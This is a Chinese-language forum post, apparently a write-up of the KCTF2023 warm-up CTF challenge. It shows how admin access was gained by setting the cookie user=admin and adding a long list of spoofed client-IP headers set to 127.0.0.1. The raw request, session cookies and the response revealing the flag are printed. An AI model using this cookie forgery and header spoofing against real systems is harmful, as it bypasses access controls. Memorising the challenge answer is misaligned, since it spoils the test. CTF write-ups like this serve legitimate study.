[原创] KCTF2023 签到题-生死较量-CTF对抗-看雪论坛-安全社区|非营利性质技术交流社区

[原创] KCTF2023 签到题-生死较量

发表于: 2023-9-4 11:05 1552

[原创] KCTF2023 签到题-生死较量

l1b3r

2023-9-4 11:05

1552

签到题生死较量

开始提示本地管理员权限，修改user=admin，再使用FakeIp插件加入本地XFF头即可

GET / HTTP/1.1
Host: 645d0ed5-95d6-484a-89c2-0a4d0afec7f1.node.kanxue.com:81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded: 127.0.0.1
X-Requested-With: 127.0.0.1
X-Forwarded-Proto: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-remote-IP: 127.0.0.1
X-remote-addr: 127.0.0.1
True-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
Ali-CDN-Real-IP: 127.0.0.1
Cdn-Src-Ip: 127.0.0.1
Cdn-Real-Ip: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
X-Cluster-Client-IP: 127.0.0.1
WL-Proxy-Client-IP: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
Fastly-Client-Ip: 127.0.0.1
True-Client-Ip: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
Content-Length: 0
Cookie: passport_sid=64f53e08c677b; passport_token=bAM46tpLgdrNDmLkjMeiMUYbZUfyNbiQsDwBj_2B0sbv0_2FYS591YLw7Ospzzl0xz_2Fv_2F3YPJg_3D_3D; wxlogin_isfreshen=1; user=admin
Connection: close

HTTP/1.1 200 OK
Content-Length: 136
Content-Type: text/html
Date: Mon, 04 Sep 2023 02:45:24 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: user=guest
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Connection: close
 
<!DOCTYPE html>
<html>
<head>
    <title>天网管理员后台系统</title>
</head>
<meta charset="utf-8">
flag{tdQvKTtPj7v1lbhkDPesHb}